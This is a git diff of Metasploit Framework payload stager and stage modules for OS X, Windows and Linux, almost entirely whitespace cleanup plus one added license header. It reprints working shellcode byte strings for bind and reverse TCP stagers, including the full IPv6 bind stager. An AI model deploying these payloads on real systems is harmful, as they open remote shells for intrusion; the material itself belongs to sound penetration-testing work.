diff --git a/modules/payloads/stagers/osx/ppc/find_tag.rb b/modules/payloads/stagers/osx/ppc/find_tag.rb index 9891f9144b..10019a46b6 100644 --- a/modules/payloads/stagers/osx/ppc/find_tag.rb +++ b/modules/payloads/stagers/osx/ppc/find_tag.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -51,7 +51,7 @@ module Metasploit3 } )) end - + # # Replace the TAG handler to just use two bytes # @@ -62,6 +62,6 @@ module Metasploit3 end return false - end + end -end \ No newline at end of file +end diff --git a/modules/payloads/stagers/osx/ppc/reverse_tcp.rb b/modules/payloads/stagers/osx/ppc/reverse_tcp.rb index 4ca9d48b1c..77b39a6ea2 100644 --- a/modules/payloads/stagers/osx/ppc/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/ppc/reverse_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -55,4 +55,4 @@ module Metasploit3 )) end -end \ No newline at end of file +end diff --git a/modules/payloads/stagers/osx/x86/bind_tcp.rb b/modules/payloads/stagers/osx/x86/bind_tcp.rb index 8e9756835d..2190055d81 100644 --- a/modules/payloads/stagers/osx/x86/bind_tcp.rb +++ b/modules/payloads/stagers/osx/x86/bind_tcp.rb @@ -25,7 +25,7 @@ module Metasploit3 'Handler' => Msf::Handler::BindTcp, 'Convention' => 'sockedi', 'Stager' => - { + { 'Offsets' => { 'LPORT' => [ 27, 'n'] }, 'Payload' => "\x31\xc0\x99\x50\x40\x50\x40\x50"+ 
diff --git a/modules/payloads/stagers/osx/x86/reverse_tcp.rb b/modules/payloads/stagers/osx/x86/reverse_tcp.rb index c99dac0e7a..b8ddfc8319 100644 --- a/modules/payloads/stagers/osx/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/x86/reverse_tcp.rb @@ -1,3 +1,14 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' require 'msf/core/handler/reverse_tcp' @@ -25,9 +36,9 @@ module Metasploit3 'Handler' => Msf::Handler::ReverseTcp, 'Convention' => 'sockedi', 'Stager' => - { + { 'Offsets' => - { + { 'LHOST' => [ 20, 'ADDR'], 'LPORT' => [ 27, 'n'] }, diff --git a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb index a66c595f0a..585aca9ae0 100644 --- a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -22,7 +22,7 @@ module Metasploit3 def self.handler_type_alias "bind_ipv6_tcp" end - + def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager (IPv6)', 
@@ -42,30 +42,30 @@ module Metasploit3 }, 'Payload' => "\xfc"+ - "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" + - "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" + - "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" + - "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" + - "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" + - "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x31\xd2\x64\x8b\x52" + - "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x6a\x18\x59\x31\xff\x31" + - "\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x81" + - "\xff\x5b\xbc\x4a\x6a\x8b\x5a\x10\x8b\x12\x75\xdb\x5e\x53\x68\x8e" + - "\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81" + - "\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00" + - "\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xe5\x49\x86\x49" + - "\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b" + - "\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf" + - "\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04" + - "\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\x68\x02\x02\x00\x00\xff\x55" + - "\x30\x31\xc0\x50\x50\x50\x6a\x06\x6a\x01\x6a\x17\xff\x55\x2c\x89" + - "\xc7\x6a\x00\x31\xc9\x51\x51\x51\x51\x51\x68\x17\x00\xff\xff\x89" + - "\xe1\x6a\x1c\x51\x57\xff\x55\x24\x31\xdb\x53\x57\xff\x55\x28\x53" + - "\x53\x57\xff\x55\x20\x89\xc7\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1" + - "\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00" + + "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" + + "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" + + "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" + + "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" + + "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" + + "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x31\xd2\x64\x8b\x52" + + 
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x6a\x18\x59\x31\xff\x31" + + "\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x81" + + "\xff\x5b\xbc\x4a\x6a\x8b\x5a\x10\x8b\x12\x75\xdb\x5e\x53\x68\x8e" + + "\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81" + + "\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00" + + "\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xe5\x49\x86\x49" + + "\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b" + + "\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf" + + "\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04" + + "\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\x68\x02\x02\x00\x00\xff\x55" + + "\x30\x31\xc0\x50\x50\x50\x6a\x06\x6a\x01\x6a\x17\xff\x55\x2c\x89" + + "\xc7\x6a\x00\x31\xc9\x51\x51\x51\x51\x51\x68\x17\x00\xff\xff\x89" + + "\xe1\x6a\x1c\x51\x57\xff\x55\x24\x31\xdb\x53\x57\xff\x55\x28\x53" + + "\x53\x57\xff\x55\x20\x89\xc7\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1" + + "\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00" + "\x00\x53\x57\xff\x55\x18\xff\xd3" } - )) + )) end end diff --git a/modules/payloads/stagers/windows/bind_nonx_tcp.rb b/modules/payloads/stagers/windows/bind_nonx_tcp.rb index 560e590fb5..4a358abdc4 100644 --- a/modules/payloads/stagers/windows/bind_nonx_tcp.rb +++ b/modules/payloads/stagers/windows/bind_nonx_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -22,7 +22,7 @@ module Metasploit3 def self.handler_type_alias "bind_nonx_tcp" end - + def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager (No NX or Win7)', 
diff --git a/modules/payloads/stagers/windows/bind_tcp.rb b/modules/payloads/stagers/windows/bind_tcp.rb index 367fcb4631..2db4d822c7 100644 --- a/modules/payloads/stagers/windows/bind_tcp.rb +++ b/modules/payloads/stagers/windows/bind_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -34,7 +34,7 @@ module Metasploit3 { 'RequiresMidstager' => false, 'Offsets' => { 'LPORT' => [ 200, 'n' ] }, - 'Payload' => + 'Payload' => # Length: 298 bytes "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + diff --git a/modules/payloads/stagers/windows/findtag_ord.rb b/modules/payloads/stagers/windows/findtag_ord.rb index 807ce58676..286e1c3ae2 100644 --- a/modules/payloads/stagers/windows/findtag_ord.rb +++ b/modules/payloads/stagers/windows/findtag_ord.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb index 2b766b33c3..bae14d0648 100644 --- a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb 
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -22,7 +22,7 @@ module Metasploit3 def self.handler_type_alias "reverse_ipv6_tcp" end - + def initialize(info = {}) super(merge_info(info, @@ -64,13 +64,13 @@ module Metasploit3 "\x02\x1b\x63\xff\xfe\x98\xbf\x36\x00\x00\x00\x00\x59\x6a\x1c\x51"+ "\x57\xff\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56"+ "\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53\x57\xff\x55\x18\xff"+ - "\xd3" + "\xd3" } )) register_options( [ OptInt.new("SCOPEID", [false, "The IPv6 Scope ID, required for link-layer addresses", 0]) - ], self.class) + ], self.class) end end diff --git a/modules/payloads/stagers/windows/reverse_nonx_tcp.rb b/modules/payloads/stagers/windows/reverse_nonx_tcp.rb index 5d4e3da451..dc603a379e 100644 --- a/modules/payloads/stagers/windows/reverse_nonx_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_nonx_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -23,7 +23,7 @@ module Metasploit3 def self.handler_type_alias "reverse_nonx_tcp" end - + def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager (No NX or Win7)', diff --git a/modules/payloads/stagers/windows/reverse_ord_tcp.rb b/modules/payloads/stagers/windows/reverse_ord_tcp.rb index 37aa8cb48e..d1b6031b19 100644 --- a/modules/payloads/stagers/windows/reverse_ord_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_ord_tcp.rb 
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -47,7 +47,7 @@ module Metasploit3 "\x72\x20\xad\xad\x4e\x03\x06\x3d\x32\x33\x5f\x32\x75\xef\x8b\x6a" + "\x08\x8b\x45\x3c\x8b\x4c\x05\x78\x8b\x4c\x0d\x1c\x01\xe9\x8b\x41" + "\x58\x01\xe8\x8b\x71\x3c\x01\xee\x03\x69\x0c\x53\x6a\x01\x6a\x02" + - "\xff\xd0\x97\x68\x7f\x00\x00\x01\x68\x02\x00\x22\x11\x89\xe1\x53" + + "\xff\xd0\x97\x68\x7f\x00\x00\x01\x68\x02\x00\x22\x11\x89\xe1\x53" + "\xb7\x0c\x53\x51\x57\x51\x6a\x10\x51\x57\x56\xff\xe5" } )) diff --git a/modules/payloads/stagers/windows/reverse_tcp.rb b/modules/payloads/stagers/windows/reverse_tcp.rb index c86240fe4a..e0afce2c2d 100644 --- a/modules/payloads/stagers/windows/reverse_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ module Metasploit3 include Msf::Payload::Stager include Msf::Payload::Windows - + def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager', @@ -34,7 +34,7 @@ module Metasploit3 { 'RequiresMidstager' => false, 'Offsets' => { 'LHOST' => [ 197, 'ADDR' ], 'LPORT' => [ 204, 'n' ], 'ReverseConnectRetries' => [ 195, 'C'] }, - 'Payload' => + 'Payload' => # Length: 290 bytes "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + @@ -58,7 +58,7 @@ module Metasploit3 } )) - + end end 
diff --git a/modules/payloads/stagers/windows/reverse_tcp_allports.rb b/modules/payloads/stagers/windows/reverse_tcp_allports.rb index 13818184cc..741ed8b5f9 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_allports.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_allports.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ module Metasploit3 include Msf::Payload::Stager include Msf::Payload::Windows - + def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse All-Port TCP Stager', @@ -34,7 +34,7 @@ module Metasploit3 { 'RequiresMidstager' => false, 'Offsets' => { 'LHOST' => [ 195, 'ADDR' ], 'LPORT' => [ 202, 'n' ], }, - 'Payload' => + 'Payload' => # Length: 294 bytes # Port Offset: 202 # Host Offset: 195 @@ -61,7 +61,7 @@ module Metasploit3 } )) end - + def self.handler_type return "reverse_tcp" end diff --git a/modules/payloads/stagers/windows/x64/bind_tcp.rb b/modules/payloads/stagers/windows/x64/bind_tcp.rb index 7b1eaeee7f..942a4ce91f 100644 --- a/modules/payloads/stagers/windows/x64/bind_tcp.rb +++ b/modules/payloads/stagers/windows/x64/bind_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -37,7 +37,7 @@ module Metasploit3 'LPORT' => [ 232, 'n' ] }, 'RequiresMidstager' => false, - 'Payload' => + 'Payload' => "\xFC\x48\x83\xE4\xF0\xE8\xC0\x00\x00\x00\x41\x51\x41\x50\x52\x51" + "\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52" + "\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x4D\x31\xC9\x48\x31\xC0" + diff --git a/modules/payloads/stagers/windows/x64/reverse_tcp.rb b/modules/payloads/stagers/windows/x64/reverse_tcp.rb index 5de8edeb94..c22d4adf6a 100644 --- a/modules/payloads/stagers/windows/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/windows/x64/reverse_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ module Metasploit3 include Msf::Payload::Stager include Msf::Payload::Windows - + def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows x64 Reverse TCP Stager', @@ -38,7 +38,7 @@ module Metasploit3 'LHOST' => [ 234, 'ADDR' ] }, 'RequiresMidstager' => false, - 'Payload' => + 'Payload' => "\xFC\x48\x83\xE4\xF0\xE8\xC0\x00\x00\x00\x41\x51\x41\x50\x52\x51" + "\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52" + "\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x4D\x31\xC9\x48\x31\xC0" + diff --git a/modules/payloads/stages/linux/x86/shell.rb b/modules/payloads/stages/linux/x86/shell.rb index 73742558f5..6bba99f073 100644 --- a/modules/payloads/stages/linux/x86/shell.rb +++ b/modules/payloads/stages/linux/x86/shell.rb 
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/payloads/stages/osx/x86/bundleinject.rb b/modules/payloads/stages/osx/x86/bundleinject.rb index 4ec8f04f63..c0b8587903 100644 --- a/modules/payloads/stages/osx/x86/bundleinject.rb +++ b/modules/payloads/stages/osx/x86/bundleinject.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/payloads/stages/windows/patchupdllinject.rb b/modules/payloads/stages/windows/patchupdllinject.rb index d8129984a3..0c5f7ba401 100644 --- a/modules/payloads/stages/windows/patchupdllinject.rb +++ b/modules/payloads/stages/windows/patchupdllinject.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/payloads/stages/windows/patchupmeterpreter.rb b/modules/payloads/stages/windows/patchupmeterpreter.rb index fd5d48786f..ffa306ec19 100644 --- a/modules/payloads/stages/windows/patchupmeterpreter.rb +++ b/modules/payloads/stages/windows/patchupmeterpreter.rb 
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/payloads/stages/windows/patchupvncinject.rb b/modules/payloads/stages/windows/patchupvncinject.rb index 71a77bf857..3b9bcab1b2 100644 --- a/modules/payloads/stages/windows/patchupvncinject.rb +++ b/modules/payloads/stages/windows/patchupvncinject.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -110,7 +110,7 @@ module Metasploit3 print_status("Launched vnciewer in the background.") end end - + super end